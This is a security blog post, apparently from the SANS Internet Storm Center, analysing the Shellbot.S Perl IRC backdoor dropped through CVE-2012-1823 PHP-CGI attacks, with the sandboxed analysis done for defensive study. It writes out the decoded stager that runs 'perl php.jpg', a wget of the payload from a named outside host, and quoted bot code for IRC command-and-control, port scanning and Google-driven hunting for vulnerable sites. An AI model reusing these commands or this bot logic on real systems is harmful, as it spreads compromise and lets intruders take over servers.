In the oldie but goodie category, reader Jon Turner sent us a fun example of old school malfeasance this morning that I'll share for your review and tactical opportunities.
I let him speak for himself:
We've been getting pretty regularly pinged with attempts to exploit CVE-2012-1823. We're not vulnerable for a few different reasons, so I'd been ignoring it but I finally got around to pulling down a packet capture of the traffic and inspecting it. The attack attempts to disable a few security-related PHP configuration settings, disable Suhosin, and then pull down and execute a Perl script via a system call.
Though I think our attacker is a bot or script kiddie (they didn't bother to fingerprint the server and pass an attack for the right OS), the script is pretty interesting. Forefront detects it as Backdoor:Perl/Shellbot.S. There are sections of the code for joining an IRC channel for CC, performing port scans, and automatically exploiting other systems. It looks like more than one developer was involved in writing the exploit code.
Let's have a little fun and dig in to Shellbot.S a bit.
As also described by Jon, the evil bits are still available at the URL in the base64_encoded instructions in the packets:
data=' ?'
If you're following along at home, use a sandboxed/isolated Linux VM that you can reset when all finished.
Via your favorite base64 encoder/decoder (I like the HackBar Firefox add-on) decode the string above and you should end up with:
echo st4r7.system( perl php.jpg).7h33nd
From my Ubuntu VM I conducted the following:
[email protected]tu:~$ netstat -ano | grep ESTABLISHED
No results.
Went and wgot the bot code.
[email protected]:~$ wget http://ckboot.altervista.org/php.jpg
--2012-07-11 13:47:41--http://ckboot.altervista.org/php.jpg
Resolving ckboot.altervista.org... 178.63.21.200
Connecting to ckboot.altervista.org|178.63.21.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15728 (15K) [image/jpeg]
Saving to: `php.jpg'
100%[=========================================================================================] 15,728 27.1K/s in 0.6s
2012-07-11 13:47:51 (27.1 KB/s) - `php.jpg' saved [15728/15728]
Followed orders per the base64 instructions:
[email protected]:~$ perl php.jpg
Now we have some results, instant IRC hookup.
[email protected]:~$ netstat -ano | grep ESTABLISHED
tcp 0 0 192.168.45.132:33371 83.66.116.112:6667 ESTABLISHED off (0.00/0/0)
My Ubuntu VM was not running an SSH daemon, I didn't even have it installed.
But line 14 of the spreader
Yep, confirmed:
[email protected]:~$ ps aux | grep sshd
malman 17940 96.30.2 69442592 pts/3 R 13:49 2:23 /usr/sbin/sshd
As Jon stated, in the code we see that the script:
1) Joins an IRC channel for CC
my @hostauth=(localhost
my @canais=(#consola
2) Performs port scans
@portas=(21,22,23,25,80,113,135,445,1025,5000,6660,6661,6662,6663,
6665,6666,6667,6668,6669,7000,8080,8018
sendraw($IRC_cur_socket, PRIVMSG $printl :\002[SCAN]\002 Scanning .$1. for open ports.
3) Automatically exploits unpatched PHP opportunities and leverages Google for some heavy lifting.
Starting at line 209:
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for .$1. seconds.
Starting at line 491:
my $query=www.google.com/search?q=
$query.=num=$nstart=$s
while ($page =~m/a class=l href=\?http:\/\/([^\]+)\?/g){
A $funcarg params check also reveals that Shellbot.S included TCP, UDP, and HTTP flooding functionality.
There are references to this source code being reported to Securityfocus as seen in attacks as far back as 2006.
But my favorite reference in this classic-come-lately?
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
Script kiddie indeed.
Keep those PHP apps and instances patched, folks.
Russ McRee | @holisticinfosec
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
